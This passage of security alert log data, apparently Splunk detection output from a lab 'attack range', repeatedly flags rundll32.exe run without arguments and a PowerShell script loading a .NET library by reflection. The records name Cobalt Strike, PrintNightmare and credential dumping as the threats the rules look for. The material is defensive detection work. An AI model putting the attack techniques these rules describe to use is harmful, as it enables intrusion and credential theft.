\"User\"}]}", annotations.analytic_story="Suspicious Rundll32 Activity", annotations.analytic_story="Cobalt Strike", annotations.analytic_story="PrintNightmare CVE-2021-34527", annotations.cis20="CIS 8", annotations.context="Source:Endpoint", annotations.context="Stage:Execution", annotations.context="Stage:Initial Access", annotations.context="Stage:Defense Evasion", annotations.cve="CVE-2021-34527", annotations.kill_chain_phases="Actions on Objectives", annotations.mitre_attack="T1218", annotations.mitre_attack="T1218.011", annotations.nist="PR.PT", annotations.nist="DE.CM", count="1", dest="exchange01.attackrange.local", info_max_time="+Infinity", info_min_time="0.000", parent_process_name="unknown", process="C:\\Windows\\System32\\rundll32.exe", process_id="23820", process_name="rundll32.exe", process_path="C:\\Windows\\System32\\rundll32.exe", risk_message="Suspicious rundll32.exe process with no command line arguments executed on exchange01.attackrange.local by $user$", risk_object="exchange01.attackrange.local", risk_object_type="system", risk_score="49.0", savedsearch_description="The following analytic identifies rundll32.exe with no command line arguments. It is unusual for rundll32.exe to execute with no command line arguments present. This particular behavior is common with malicious software, including Cobalt Strike. During investigation, identify any network connections and parallel processes. Identify any suspicious module loads related to credential dumping or file writes. Rundll32.exe is natively found in C:\\Windows\\system32 and C:\\Windows\\syswow64." 1664805600, search_name="ESCU - Suspicious Rundll32 no Command Line Arguments - Rule", orig_time="1664805600", analyticstories="Cobalt Strike", analyticstories="PrintNightmare CVE-2021-34527", analyticstories="Suspicious Rundll32 Activity", annotations="{\"analytic_story\": [\"Suspicious Rundll32 Activity\", \"Cobalt Strike\", \"PrintNightmare CVE-2021-34527\"], \"cis20\": [\"CIS 8\"], \"confidence\": 70, \"context\": [\"Source:Endpoint\", \"Stage:Execution\", \"Stage:Initial Access\", \"Stage:Defense Evasion\"], \"cve\": [\"CVE-2021-34527\"], \"impact\": 70, \"kill_chain_phases\": [\"Actions on Objectives\"], \"mitre_attack\": [\"T1218\", \"T1218.011\"], \"nist\": [\"PR.PT\", \"DE.CM\"], \"observable\": [{\"name\": \"dest\", \"role\": [\"Victim\"], \"type\": \"Endpoint\"}, {\"name\": \"User\", \"role\": [\"Victim\"], \"type\": \"User\"}]}", annotations.analytic_story="Suspicious Rundll32 Activity", annotations.analytic_story="Cobalt Strike", annotations.analytic_story="PrintNightmare CVE-2021-34527", annotations.cis20="CIS 8", annotations.context="Source:Endpoint", annotations.context="Stage:Execution", annotations.context="Stage:Initial Access", annotations.context="Stage:Defense Evasion", annotations.cve="CVE-2021-34527", annotations.kill_chain_phases="Actions on Objectives", annotations.mitre_attack="T1218", annotations.mitre_attack="T1218.011", annotations.nist="PR.PT", annotations.nist="DE.CM", count="1", dest="exchange01.attackrange.local", info_max_time="+Infinity", info_min_time="0.000", parent_process_name="unknown", process="C:\\Windows\\System32\\rundll32.exe", process_id="16564", process_name="rundll32.exe", process_path="C:\\Windows\\System32\\rundll32.exe", risk_message="Suspicious rundll32.exe process with no command line arguments executed on exchange01.attackrange.local by $user$", risk_object="exchange01.attackrange.local", risk_object_type="system", risk_score="49.0", savedsearch_description="The following analytic identifies rundll32.exe with no command line arguments. It is unusual for rundll32.exe to execute with no command line arguments present. This particular behavior is common with malicious software, including Cobalt Strike. During investigation, identify any network connections and parallel processes. Identify any suspicious module loads related to credential dumping or file writes. Rundll32.exe is natively found in C:\\Windows\\system32 and C:\\Windows\\syswow64." 1664805600, search_name="ESCU - Suspicious Rundll32 no Command Line Arguments - Rule", orig_time="1664805600", analyticstories="Cobalt Strike", analyticstories="PrintNightmare CVE-2021-34527", analyticstories="Suspicious Rundll32 Activity", annotations="{\"analytic_story\": [\"Suspicious Rundll32 Activity\", \"Cobalt Strike\", \"PrintNightmare CVE-2021-34527\"], \"cis20\": [\"CIS 8\"], \"confidence\": 70, \"context\": [\"Source:Endpoint\", \"Stage:Execution\", \"Stage:Initial Access\", \"Stage:Defense Evasion\"], \"cve\": [\"CVE-2021-34527\"], \"impact\": 70, \"kill_chain_phases\": [\"Actions on Objectives\"], \"mitre_attack\": [\"T1218\", \"T1218.011\"], \"nist\": [\"PR.PT\", \"DE.CM\"], \"observable\": [{\"name\": \"dest\", \"role\": [\"Victim\"], \"type\": \"Endpoint\"}, {\"name\": \"User\", \"role\": [\"Victim\"], \"type\": \"User\"}]}", annotations.analytic_story="Suspicious Rundll32 Activity", annotations.analytic_story="Cobalt Strike", annotations.analytic_story="PrintNightmare CVE-2021-34527", annotations.cis20="CIS 8", annotations.context="Source:Endpoint", annotations.context="Stage:Execution", annotations.context="Stage:Initial Access", annotations.context="Stage:Defense Evasion", annotations.cve="CVE-2021-34527", annotations.kill_chain_phases="Actions on Objectives", annotations.mitre_attack="T1218", annotations.mitre_attack="T1218.011", annotations.nist="PR.PT", annotations.nist="DE.CM", count="1", dest="exchange01.attackrange.local", info_max_time="+Infinity", info_min_time="0.000", parent_process_name="unknown", process="C:\\Windows\\System32\\rundll32.exe", process_id="16228", process_name="rundll32.exe", process_path="C:\\Windows\\System32\\rundll32.exe", risk_message="Suspicious rundll32.exe process with no command line arguments executed on exchange01.attackrange.local by $user$", risk_object="exchange01.attackrange.local", risk_object_type="system", risk_score="49.0", savedsearch_description="The following analytic identifies rundll32.exe with no command line arguments. It is unusual for rundll32.exe to execute with no command line arguments present. This particular behavior is common with malicious software, including Cobalt Strike. During investigation, identify any network connections and parallel processes. Identify any suspicious module loads related to credential dumping or file writes. Rundll32.exe is natively found in C:\\Windows\\system32 and C:\\Windows\\syswow64." 1664805600, search_name="ESCU - Suspicious Rundll32 no Command Line Arguments - Rule", orig_time="1664805600", analyticstories="Cobalt Strike", analyticstories="PrintNightmare CVE-2021-34527", analyticstories="Suspicious Rundll32 Activity", annotations="{\"analytic_story\": [\"Suspicious Rundll32 Activity\", \"Cobalt Strike\", \"PrintNightmare CVE-2021-34527\"], \"cis20\": [\"CIS 8\"], \"confidence\": 70, \"context\": [\"Source:Endpoint\", \"Stage:Execution\", \"Stage:Initial Access\", \"Stage:Defense Evasion\"], \"cve\": [\"CVE-2021-34527\"], \"impact\": 70, \"kill_chain_phases\": [\"Actions on Objectives\"], \"mitre_attack\": [\"T1218\", \"T1218.011\"], \"nist\": [\"PR.PT\", \"DE.CM\"], \"observable\": [{\"name\": \"dest\", \"role\": [\"Victim\"], \"type\": \"Endpoint\"}, {\"name\": \"User\", \"role\": [\"Victim\"], \"type\": \"User\"}]}", annotations.analytic_story="Suspicious Rundll32 Activity", annotations.analytic_story="Cobalt Strike", annotations.analytic_story="PrintNightmare CVE-2021-34527", annotations.cis20="CIS 8", annotations.context="Source:Endpoint", annotations.context="Stage:Execution", annotations.context="Stage:Initial Access", annotations.context="Stage:Defense Evasion", annotations.cve="CVE-2021-34527", annotations.kill_chain_phases="Actions on Objectives", annotations.mitre_attack="T1218", annotations.mitre_attack="T1218.011", annotations.nist="PR.PT", annotations.nist="DE.CM", count="1", dest="exchange01.attackrange.local", info_max_time="+Infinity", info_min_time="0.000", parent_process_name="unknown", process="C:\\Windows\\System32\\rundll32.exe", process_id="0x9e0", process_name="rundll32.exe", process_path="C:\\Windows\\System32\\rundll32.exe", risk_message="Suspicious rundll32.exe process with no command line arguments executed on exchange01.attackrange.local by $user$", risk_object="exchange01.attackrange.local", risk_object_type="system", risk_score="49.0", savedsearch_description="The following analytic identifies rundll32.exe with no command line arguments. It is unusual for rundll32.exe to execute with no command line arguments present. This particular behavior is common with malicious software, including Cobalt Strike. During investigation, identify any network connections and parallel processes. Identify any suspicious module loads related to credential dumping or file writes. Rundll32.exe is natively found in C:\\Windows\\system32 and C:\\Windows\\syswow64." 1664805600, search_name="ESCU - Suspicious Rundll32 no Command Line Arguments - Rule", orig_time="1664805600", analyticstories="Cobalt Strike", analyticstories="PrintNightmare CVE-2021-34527", analyticstories="Suspicious Rundll32 Activity", annotations="{\"analytic_story\": [\"Suspicious Rundll32 Activity\", \"Cobalt Strike\", \"PrintNightmare CVE-2021-34527\"], \"cis20\": [\"CIS 8\"], \"confidence\": 70, \"context\": [\"Source:Endpoint\", \"Stage:Execution\", \"Stage:Initial Access\", \"Stage:Defense Evasion\"], \"cve\": [\"CVE-2021-34527\"], \"impact\": 70, \"kill_chain_phases\": [\"Actions on Objectives\"], \"mitre_attack\": [\"T1218\", \"T1218.011\"], \"nist\": [\"PR.PT\", \"DE.CM\"], \"observable\": [{\"name\": \"dest\", \"role\": [\"Victim\"], \"type\": \"Endpoint\"}, {\"name\": \"User\", \"role\": [\"Victim\"], \"type\": \"User\"}]}", annotations.analytic_story="Suspicious Rundll32 Activity", annotations.analytic_story="Cobalt Strike", annotations.analytic_story="PrintNightmare CVE-2021-34527", annotations.cis20="CIS 8", annotations.context="Source:Endpoint", annotations.context="Stage:Execution", annotations.context="Stage:Initial Access", annotations.context="Stage:Defense Evasion", annotations.cve="CVE-2021-34527", annotations.kill_chain_phases="Actions on Objectives", annotations.mitre_attack="T1218", annotations.mitre_attack="T1218.011", annotations.nist="PR.PT", annotations.nist="DE.CM", count="1", dest="exchange01.attackrange.local", info_max_time="+Infinity", info_min_time="0.000", parent_process_name="unknown", process="C:\\Windows\\System32\\rundll32.exe", process_id="0x5d0c", process_name="rundll32.exe", process_path="C:\\Windows\\System32\\rundll32.exe", risk_message="Suspicious rundll32.exe process with no command line arguments executed on exchange01.attackrange.local by $user$", risk_object="exchange01.attackrange.local", risk_object_type="system", risk_score="49.0", savedsearch_description="The following analytic identifies rundll32.exe with no command line arguments. It is unusual for rundll32.exe to execute with no command line arguments present. This particular behavior is common with malicious software, including Cobalt Strike. During investigation, identify any network connections and parallel processes. Identify any suspicious module loads related to credential dumping or file writes. Rundll32.exe is natively found in C:\\Windows\\system32 and C:\\Windows\\syswow64." 1664805600, search_name="ESCU - Suspicious Rundll32 no Command Line Arguments - Rule", orig_time="1664805600", analyticstories="Cobalt Strike", analyticstories="PrintNightmare CVE-2021-34527", analyticstories="Suspicious Rundll32 Activity", annotations="{\"analytic_story\": [\"Suspicious Rundll32 Activity\", \"Cobalt Strike\", \"PrintNightmare CVE-2021-34527\"], \"cis20\": [\"CIS 8\"], \"confidence\": 70, \"context\": [\"Source:Endpoint\", \"Stage:Execution\", \"Stage:Initial Access\", \"Stage:Defense Evasion\"], \"cve\": [\"CVE-2021-34527\"], \"impact\": 70, \"kill_chain_phases\": [\"Actions on Objectives\"], \"mitre_attack\": [\"T1218\", \"T1218.011\"], \"nist\": [\"PR.PT\", \"DE.CM\"], \"observable\": [{\"name\": \"dest\", \"role\": [\"Victim\"], \"type\": \"Endpoint\"}, {\"name\": \"User\", \"role\": [\"Victim\"], \"type\": \"User\"}]}", annotations.analytic_story="Suspicious Rundll32 Activity", annotations.analytic_story="Cobalt Strike", annotations.analytic_story="PrintNightmare CVE-2021-34527", annotations.cis20="CIS 8", annotations.context="Source:Endpoint", annotations.context="Stage:Execution", annotations.context="Stage:Initial Access", annotations.context="Stage:Defense Evasion", annotations.cve="CVE-2021-34527", annotations.kill_chain_phases="Actions on Objectives", annotations.mitre_attack="T1218", annotations.mitre_attack="T1218.011", annotations.nist="PR.PT", annotations.nist="DE.CM", count="1", dest="exchange01.attackrange.local", info_max_time="+Infinity", info_min_time="0.000", parent_process_name="unknown", process="C:\\Windows\\System32\\rundll32.exe", process_id="0x5c", process_name="rundll32.exe", process_path="C:\\Windows\\System32\\rundll32.exe", risk_message="Suspicious rundll32.exe process with no command line arguments executed on exchange01.attackrange.local by $user$", risk_object="exchange01.attackrange.local", risk_object_type="system", risk_score="49.0", savedsearch_description="The following analytic identifies rundll32.exe with no command line arguments. It is unusual for rundll32.exe to execute with no command line arguments present. This particular behavior is common with malicious software, including Cobalt Strike. During investigation, identify any network connections and parallel processes. Identify any suspicious module loads related to credential dumping or file writes. Rundll32.exe is natively found in C:\\Windows\\system32 and C:\\Windows\\syswow64." 1664805600, search_name="ESCU - Suspicious Rundll32 no Command Line Arguments - Rule", orig_time="1664805600", analyticstories="Cobalt Strike", analyticstories="PrintNightmare CVE-2021-34527", analyticstories="Suspicious Rundll32 Activity", annotations="{\"analytic_story\": [\"Suspicious Rundll32 Activity\", \"Cobalt Strike\", \"PrintNightmare CVE-2021-34527\"], \"cis20\": [\"CIS 8\"], \"confidence\": 70, \"context\": [\"Source:Endpoint\", \"Stage:Execution\", \"Stage:Initial Access\", \"Stage:Defense Evasion\"], \"cve\": [\"CVE-2021-34527\"], \"impact\": 70, \"kill_chain_phases\": [\"Actions on Objectives\"], \"mitre_attack\": [\"T1218\", \"T1218.011\"], \"nist\": [\"PR.PT\", \"DE.CM\"], \"observable\": [{\"name\": \"dest\", \"role\": [\"Victim\"], \"type\": \"Endpoint\"}, {\"name\": \"User\", \"role\": [\"Victim\"], \"type\": \"User\"}]}", annotations.analytic_story="Suspicious Rundll32 Activity", annotations.analytic_story="Cobalt Strike", annotations.analytic_story="PrintNightmare CVE-2021-34527", annotations.cis20="CIS 8", annotations.context="Source:Endpoint", annotations.context="Stage:Execution", annotations.context="Stage:Initial Access", annotations.context="Stage:Defense Evasion", annotations.cve="CVE-2021-34527", annotations.kill_chain_phases="Actions on Objectives", annotations.mitre_attack="T1218", annotations.mitre_attack="T1218.011", annotations.nist="PR.PT", annotations.nist="DE.CM", count="1", dest="exchange01.attackrange.local", info_max_time="+Infinity", info_min_time="0.000", parent_process_name="unknown", process="C:\\Windows\\System32\\rundll32.exe", process_id="0x40b4", process_name="rundll32.exe", process_path="C:\\Windows\\System32\\rundll32.exe", risk_message="Suspicious rundll32.exe process with no command line arguments executed on exchange01.attackrange.local by $user$", risk_object="exchange01.attackrange.local", risk_object_type="system", risk_score="49.0", savedsearch_description="The following analytic identifies rundll32.exe with no command line arguments. It is unusual for rundll32.exe to execute with no command line arguments present. This particular behavior is common with malicious software, including Cobalt Strike. During investigation, identify any network connections and parallel processes. Identify any suspicious module loads related to credential dumping or file writes. Rundll32.exe is natively found in C:\\Windows\\system32 and C:\\Windows\\syswow64." 1664805600, search_name="ESCU - Suspicious Rundll32 no Command Line Arguments - Rule", orig_time="1664805600", analyticstories="Cobalt Strike", analyticstories="PrintNightmare CVE-2021-34527", analyticstories="Suspicious Rundll32 Activity", annotations="{\"analytic_story\": [\"Suspicious Rundll32 Activity\", \"Cobalt Strike\", \"PrintNightmare CVE-2021-34527\"], \"cis20\": [\"CIS 8\"], \"confidence\": 70, \"context\": [\"Source:Endpoint\", \"Stage:Execution\", \"Stage:Initial Access\", \"Stage:Defense Evasion\"], \"cve\": [\"CVE-2021-34527\"], \"impact\": 70, \"kill_chain_phases\": [\"Actions on Objectives\"], \"mitre_attack\": [\"T1218\", \"T1218.011\"], \"nist\": [\"PR.PT\", \"DE.CM\"], \"observable\": [{\"name\": \"dest\", \"role\": [\"Victim\"], \"type\": \"Endpoint\"}, {\"name\": \"User\", \"role\": [\"Victim\"], \"type\": \"User\"}]}", annotations.analytic_story="Suspicious Rundll32 Activity", annotations.analytic_story="Cobalt Strike", annotations.analytic_story="PrintNightmare CVE-2021-34527", annotations.cis20="CIS 8", annotations.context="Source:Endpoint", annotations.context="Stage:Execution", annotations.context="Stage:Initial Access", annotations.context="Stage:Defense Evasion", annotations.cve="CVE-2021-34527", annotations.kill_chain_phases="Actions on Objectives", annotations.mitre_attack="T1218", annotations.mitre_attack="T1218.011", annotations.nist="PR.PT", annotations.nist="DE.CM", count="1", dest="exchange01.attackrange.local", info_max_time="+Infinity", info_min_time="0.000", parent_process_name="unknown", process="C:\\Windows\\System32\\rundll32.exe", process_id="0x3f64", process_name="rundll32.exe", process_path="C:\\Windows\\System32\\rundll32.exe", risk_message="Suspicious rundll32.exe process with no command line arguments executed on exchange01.attackrange.local by $user$", risk_object="exchange01.attackrange.local", risk_object_type="system", risk_score="49.0", savedsearch_description="The following analytic identifies rundll32.exe with no command line arguments. It is unusual for rundll32.exe to execute with no command line arguments present. This particular behavior is common with malicious software, including Cobalt Strike. During investigation, identify any network connections and parallel processes. Identify any suspicious module loads related to credential dumping or file writes. Rundll32.exe is natively found in C:\\Windows\\system32 and C:\\Windows\\syswow64." 1664805600, search_name="ESCU - Suspicious Rundll32 no Command Line Arguments - Rule", orig_time="1664805600", analyticstories="Cobalt Strike", analyticstories="PrintNightmare CVE-2021-34527", analyticstories="Suspicious Rundll32 Activity", annotations="{\"analytic_story\": [\"Suspicious Rundll32 Activity\", \"Cobalt Strike\", \"PrintNightmare CVE-2021-34527\"], \"cis20\": [\"CIS 8\"], \"confidence\": 70, \"context\": [\"Source:Endpoint\", \"Stage:Execution\", \"Stage:Initial Access\", \"Stage:Defense Evasion\"], \"cve\": [\"CVE-2021-34527\"], \"impact\": 70, \"kill_chain_phases\": [\"Actions on Objectives\"], \"mitre_attack\": [\"T1218\", \"T1218.011\"], \"nist\": [\"PR.PT\", \"DE.CM\"], \"observable\": [{\"name\": \"dest\", \"role\": [\"Victim\"], \"type\": \"Endpoint\"}, {\"name\": \"User\", \"role\": [\"Victim\"], \"type\": \"User\"}]}", annotations.analytic_story="Suspicious Rundll32 Activity", annotations.analytic_story="Cobalt Strike", annotations.analytic_story="PrintNightmare CVE-2021-34527", annotations.cis20="CIS 8", annotations.context="Source:Endpoint", annotations.context="Stage:Execution", annotations.context="Stage:Initial Access", annotations.context="Stage:Defense Evasion", annotations.cve="CVE-2021-34527", annotations.kill_chain_phases="Actions on Objectives", annotations.mitre_attack="T1218", annotations.mitre_attack="T1218.011", annotations.nist="PR.PT", annotations.nist="DE.CM", count="1", dest="win-dc-mhaag-attack-range-622.attackrange.local", info_max_time="+Infinity", info_min_time="0.000", parent_process_name="unknown", process="C:\\Windows\\System32\\rundll32.exe", process_id="0x15d0", process_name="rundll32.exe", process_path="C:\\Windows\\System32\\rundll32.exe", risk_message="Suspicious rundll32.exe process with no command line arguments executed on win-dc-mhaag-attack-range-622.attackrange.local by $user$", risk_object="win-dc-mhaag-attack-range-622.attackrange.local", risk_object_type="system", risk_score="49.0", savedsearch_description="The following analytic identifies rundll32.exe with no command line arguments. It is unusual for rundll32.exe to execute with no command line arguments present. This particular behavior is common with malicious software, including Cobalt Strike. During investigation, identify any network connections and parallel processes. Identify any suspicious module loads related to credential dumping or file writes. Rundll32.exe is natively found in C:\\Windows\\system32 and C:\\Windows\\syswow64." 1664805600, search_name="ESCU - Suspicious Rundll32 no Command Line Arguments - Rule", orig_time="1664805600", analyticstories="Cobalt Strike", analyticstories="PrintNightmare CVE-2021-34527", analyticstories="Suspicious Rundll32 Activity", annotations="{\"analytic_story\": [\"Suspicious Rundll32 Activity\", \"Cobalt Strike\", \"PrintNightmare CVE-2021-34527\"], \"cis20\": [\"CIS 8\"], \"confidence\": 70, \"context\": [\"Source:Endpoint\", \"Stage:Execution\", \"Stage:Initial Access\", \"Stage:Defense Evasion\"], \"cve\": [\"CVE-2021-34527\"], \"impact\": 70, \"kill_chain_phases\": [\"Actions on Objectives\"], \"mitre_attack\": [\"T1218\", \"T1218.011\"], \"nist\": [\"PR.PT\", \"DE.CM\"], \"observable\": [{\"name\": \"dest\", \"role\": [\"Victim\"], \"type\": \"Endpoint\"}, {\"name\": \"User\", \"role\": [\"Victim\"], \"type\": \"User\"}]}", annotations.analytic_story="Suspicious Rundll32 Activity", annotations.analytic_story="Cobalt Strike", annotations.analytic_story="PrintNightmare CVE-2021-34527", annotations.cis20="CIS 8", annotations.context="Source:Endpoint", annotations.context="Stage:Execution", annotations.context="Stage:Initial Access", annotations.context="Stage:Defense Evasion", annotations.cve="CVE-2021-34527", annotations.kill_chain_phases="Actions on Objectives", annotations.mitre_attack="T1218", annotations.mitre_attack="T1218.011", annotations.nist="PR.PT", annotations.nist="DE.CM", count="1", dest="win-dc-mhaag-attack-range-622.attackrange.local", info_max_time="+Infinity", info_min_time="0.000", parent_process_name="unknown", process="C:\\Windows\\System32\\rundll32.exe", process_id="0x1174", process_name="rundll32.exe", process_path="C:\\Windows\\System32\\rundll32.exe", risk_message="Suspicious rundll32.exe process with no command line arguments executed on win-dc-mhaag-attack-range-622.attackrange.local by $user$", risk_object="win-dc-mhaag-attack-range-622.attackrange.local", risk_object_type="system", risk_score="49.0", savedsearch_description="The following analytic identifies rundll32.exe with no command line arguments. It is unusual for rundll32.exe to execute with no command line arguments present. This particular behavior is common with malicious software, including Cobalt Strike. During investigation, identify any network connections and parallel processes. Identify any suspicious module loads related to credential dumping or file writes. Rundll32.exe is natively found in C:\\Windows\\system32 and C:\\Windows\\syswow64." 1664802000, search_name="ESCU - Suspicious Rundll32 no Command Line Arguments - Rule", orig_time="1664802000", analyticstories="Cobalt Strike", analyticstories="PrintNightmare CVE-2021-34527", analyticstories="Suspicious Rundll32 Activity", annotations="{\"analytic_story\": [\"Suspicious Rundll32 Activity\", \"Cobalt Strike\", \"PrintNightmare CVE-2021-34527\"], \"cis20\": [\"CIS 8\"], \"confidence\": 70, \"context\": [\"Source:Endpoint\", \"Stage:Execution\", \"Stage:Initial Access\", \"Stage:Defense Evasion\"], \"cve\": [\"CVE-2021-34527\"], \"impact\": 70, \"kill_chain_phases\": [\"Actions on Objectives\"], \"mitre_attack\": [\"T1218\", \"T1218.011\"], \"nist\": [\"PR.PT\", \"DE.CM\"], \"observable\": [{\"name\": \"dest\", \"role\": [\"Victim\"], \"type\": \"Endpoint\"}, {\"name\": \"User\", \"role\": [\"Victim\"], \"type\": \"User\"}]}", annotations.analytic_story="Suspicious Rundll32 Activity", annotations.analytic_story="Cobalt Strike", annotations.analytic_story="PrintNightmare CVE-2021-34527", annotations.cis20="CIS 8", annotations.context="Source:Endpoint", annotations.context="Stage:Execution", annotations.context="Stage:Initial Access", annotations.context="Stage:Defense Evasion", annotations.cve="CVE-2021-34527", annotations.kill_chain_phases="Actions on Objectives", annotations.mitre_attack="T1218", annotations.mitre_attack="T1218.011", annotations.nist="PR.PT", annotations.nist="DE.CM", count="1", dest="exchange01.attackrange.local", info_max_time="+Infinity", info_min_time="0.000", parent_process_name="unknown", process="C:\\Windows\\System32\\rundll32.exe", process_id="18576", process_name="rundll32.exe", process_path="C:\\Windows\\System32\\rundll32.exe", risk_message="Suspicious rundll32.exe process with no command line arguments executed on exchange01.attackrange.local by $user$", risk_object="exchange01.attackrange.local", risk_object_type="system", risk_score="49.0", savedsearch_description="The following analytic identifies rundll32.exe with no command line arguments. It is unusual for rundll32.exe to execute with no command line arguments present. This particular behavior is common with malicious software, including Cobalt Strike. During investigation, identify any network connections and parallel processes. Identify any suspicious module loads related to credential dumping or file writes. Rundll32.exe is natively found in C:\\Windows\\system32 and C:\\Windows\\syswow64." 1664802000, search_name="ESCU - Suspicious Rundll32 no Command Line Arguments - Rule", orig_time="1664802000", analyticstories="Cobalt Strike", analyticstories="PrintNightmare CVE-2021-34527", analyticstories="Suspicious Rundll32 Activity", annotations="{\"analytic_story\": [\"Suspicious Rundll32 Activity\", \"Cobalt Strike\", \"PrintNightmare CVE-2021-34527\"], \"cis20\": [\"CIS 8\"], \"confidence\": 70, \"context\": [\"Source:Endpoint\", \"Stage:Execution\", \"Stage:Initial Access\", \"Stage:Defense Evasion\"], \"cve\": [\"CVE-2021-34527\"], \"impact\": 70, \"kill_chain_phases\": [\"Actions on Objectives\"], \"mitre_attack\": [\"T1218\", \"T1218.011\"], \"nist\": [\"PR.PT\", \"DE.CM\"], \"observable\": [{\"name\": \"dest\", \"role\": [\"Victim\"], \"type\": \"Endpoint\"}, {\"name\": \"User\", \"role\": [\"Victim\"], \"type\": \"User\"}]}", annotations.analytic_story="Suspicious Rundll32 Activity", annotations.analytic_story="Cobalt Strike", annotations.analytic_story="PrintNightmare CVE-2021-34527", annotations.cis20="CIS 8", annotations.context="Source:Endpoint", annotations.context="Stage:Execution", annotations.context="Stage:Initial Access", annotations.context="Stage:Defense Evasion", annotations.cve="CVE-2021-34527", annotations.kill_chain_phases="Actions on Objectives", annotations.mitre_attack="T1218", annotations.mitre_attack="T1218.011", annotations.nist="PR.PT", annotations.nist="DE.CM", count="1", dest="exchange01.attackrange.local", info_max_time="+Infinity", info_min_time="0.000", parent_process_name="unknown", process="C:\\Windows\\System32\\rundll32.exe", process_id="0x4890", process_name="rundll32.exe", process_path="C:\\Windows\\System32\\rundll32.exe", risk_message="Suspicious rundll32.exe process with no command line arguments executed on exchange01.attackrange.local by $user$", risk_object="exchange01.attackrange.local", risk_object_type="system", risk_score="49.0", savedsearch_description="The following analytic identifies rundll32.exe with no command line arguments. It is unusual for rundll32.exe to execute with no command line arguments present. This particular behavior is common with malicious software, including Cobalt Strike. During investigation, identify any network connections and parallel processes. Identify any suspicious module loads related to credential dumping or file writes. Rundll32.exe is natively found in C:\\Windows\\system32 and C:\\Windows\\syswow64." 1664812532, search_name="ESCU - PowerShell Loading DotNET into Memory via Reflection - Rule", Computer="win-dc-mhaag-attack-range-622.attackrange.local", EventCode="4104", Opcode="15", ScriptBlockText="function Load-Assembly { $libDir = Join-Path $here \"lib\" $assemblies = @{ \"core\" = Join-Path $libDir \"netstandard1.3\\YamlDotNet.dll\"; \"net45\" = Join-Path $libDir \"net45\\YamlDotNet.dll\"; \"net35\" = Join-Path $libDir \"net35\\YamlDotNet.dll\"; } if ($PSVersionTable.PSEdition -eq \"Core\") { return [Reflection.Assembly]::LoadFrom($assemblies[\"core\"]) } elseif ($PSVersionTable.PSVersion.Major -ge 4) { return [Reflection.Assembly]::LoadFrom($assemblies[\"net45\"]) } else { return [Reflection.Assembly]::LoadFrom($assemblies[\"net35\"]) } }", UserID="'S-1-5-21-2251518177-1696790515-3014453336-500'", analyticstories="Hermetic Wiper", analyticstories="Malicious PowerShell", annotations="{\"analytic_story\": [\"Hermetic Wiper\", \"Malicious PowerShell\"], \"confidence\": 80, \"context\": [\"Source:Endpoint\", \"Stage:Defense Evasion\"], \"impact\": 70, \"kill_chain_phases\": [\"Exploitation\"], \"mitre_attack\": [\"T1059\", \"T1059.001\"], \"observable\": [{\"name\": \"Computer\", \"role\": [\"Victim\"], \"type\": \"Hostname\"}, {\"name\": \"UserID\", \"role\": [\"Victim\"], \"type\": \"User\"}]}", annotations.analytic_story="Hermetic Wiper", annotations.analytic_story="Malicious PowerShell", annotations.context="Source:Endpoint", annotations.context="Stage:Defense Evasion", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1059", annotations.mitre_attack="T1059.001", count="1", firstTime="2022-10-03T14:16:31", info_max_time="+Infinity", info_min_time="0.000", lastTime="2022-10-03T14:16:31", risk_message="A suspicious powershell script contains reflective class assembly command in function Load-Assembly { $libDir = Join-Path $here \"lib\" $assemblies = @{ \"core\" = Join-Path $libDir \"netstandard1.3\\YamlDotNet.dll\"; \"net45\" = Join-Path $libDir \"net45\\YamlDotNet.dll\"; \"net35\" = Join-Path $libDir \"net35\\YamlDotNet.dll\"; } if ($PSVersionTable.PSEdition -eq \"Core\") { return [Reflection.Assembly]::LoadFrom($assemblies[\"core\"]) } elseif ($PSVersionTable.PSVersion.Major -ge 4) { return [Reflection.Assembly]::LoadFrom($assemblies[\"net45\"]) } else { return [Reflection.Assembly]::LoadFrom($assemblies[\"net35\"]) } } to load .net code in memory with EventCode 4104 in host win-dc-mhaag-attack-range-622.attackrange.local", risk_object="'S-1-5-21-2251518177-1696790515-3014453336-500'", risk_object_type="user", risk_score="56.0", savedsearch_description="The following analytic utilizes PowerShell Script Block Logging (EventCode=4104) to identify suspicious PowerShell execution. Script Block Logging captures the command sent to PowerShell, the full command to be executed. Upon enabling, logs will output to Windows event logs. Dependent upon volume, enable no critical endpoints or all. This analytic identifies the use of PowerShell loading .net assembly via reflection. This is commonly found in malicious PowerShell usage, including Empire and Cobalt Strike. In addition, the `load(` value may be modifed by removing `(` and it will identify more events to review. During triage, review parallel processes using an EDR product or 4688 events. It will be important to understand the timeline of events around this activity. Review the entire logged PowerShell script block." 1664812532, search_name="ESCU - PowerShell Loading DotNET into Memory via Reflection - Rule", Computer="win-dc-mhaag-attack-range-622.attackrange.local", EventCode="4104", Opcode="15", ScriptBlockText="function Load-Assembly { $libDir = Join-Path $here \"lib\" $assemblies = @{ \"core\" = Join-Path $libDir \"netstandard1.3\\YamlDotNet.dll\"; \"net45\" = Join-Path $libDir \"net45\\YamlDotNet.dll\"; \"net35\" = Join-Path $libDir \"net35\\YamlDotNet.dll\"; } if ($PSVersionTable.PSEdition -eq \"Core\") { return [Reflection.Assembly]::LoadFrom($assemblies[\"core\"]) } elseif ($PSVersionTable.PSVersion.Major -ge 4) { return [Reflection.Assembly]::LoadFrom($assemblies[\"net45\"]) } else { return [Reflection.Assembly]::LoadFrom($assemblies[\"net35\"]) } }", UserID="'S-1-5-21-2251518177-1696790515-3014453336-500'", analyticstories="Hermetic Wiper", analyticstories="Malicious PowerShell", annotations="{\"analytic_story\": [\"Hermetic Wiper\", \"Malicious PowerShell\"], \"confidence\": 80, \"context\": [\"Source:Endpoint\", \"Stage:Defense Evasion\"], \"impact\": 70, \"kill_chain_phases\": [\"Exploitation\"], \"mitre_attack\": [\"T1059\", \"T1059.001\"], \"observable\": [{\"name\": \"Computer\", \"role\": [\"Victim\"], \"type\": \"Hostname\"}, {\"name\": \"UserID\", \"role\": [\"Victim\"], \"type\": \"User\"}]}", annotations.analytic_story="Hermetic Wiper", annotations.analytic_story="Malicious PowerShell", annotations.context="Source:Endpoint", annotations.context="Stage:Defense Evasion", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1059", annotations.mitre_attack="T1059.001", count="1", firstTime="2022-10-03T14:16:31", info_max_time="+Infinity", info_min_time="0.000", lastTime="2022-10-03T14:16:31", risk_message="A suspicious powershell script contains reflective class assembly command in function Load-Assembly { $libDir = Join-Path $here \"lib\" $assemblies = @{ \"core\" = Join-Path $libDir \"netstandard1.3\\YamlDotNet.dll\"; \"net45\" = Join-Path $libDir \"net45\\YamlDotNet.dll\"; \"net35\" = 